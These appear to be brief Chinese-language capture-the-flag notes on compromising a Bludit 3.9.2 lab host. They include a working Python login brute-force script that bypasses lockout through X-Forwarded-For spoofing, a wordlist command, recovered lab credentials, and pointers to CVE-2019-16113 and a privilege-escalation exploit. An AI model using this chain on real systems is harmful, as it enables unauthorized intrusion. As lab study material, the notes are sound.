-更新CMS
-关闭FTP-完成
-删除旧用户-完成
-通知弗格斯,新博客需要图片-待定
fergus应该是用户名
找到登录界面
bludit 3.9.2爆破脚本
#!/usr/bin/env python3
import re
import requests
#from __future__ import print_function
def open_ressources(file_path):
return [item.replace("\n", "") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/root/pass.txt')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
cewl -w pass.txt -d 10 -m 1 http://10.10.10.191
生成字典
fergus:RolandDeschain
直接上msf cve-2019-16113
得到低权限
想办法提权
密码解不开
Password120
https://www.exploit-db.com/exploits/47502
提权